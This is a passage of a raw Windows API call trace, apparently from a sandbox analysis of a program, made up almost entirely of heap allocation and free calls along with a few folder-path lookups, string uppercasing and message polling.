0x2aa90b8 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0101.072] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6648 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0101.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0101.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0101.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0101.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75240 [0101.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6648 | out: hHeap=0x2af0000) returned 1 [0101.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0101.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0101.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0101.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0101.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0101.073] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0101.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0101.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0101.074] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0101.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6140 [0101.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0101.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0101.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6140 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0101.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72648 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0101.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0101.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0101.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0101.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0101.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0101.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0101.076] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0101.076] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0101.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0101.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0101.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0101.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0101.076] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0101.076] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0101.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0101.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0101.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0101.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0101.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0101.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0101.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0101.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0101.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0101.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0101.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 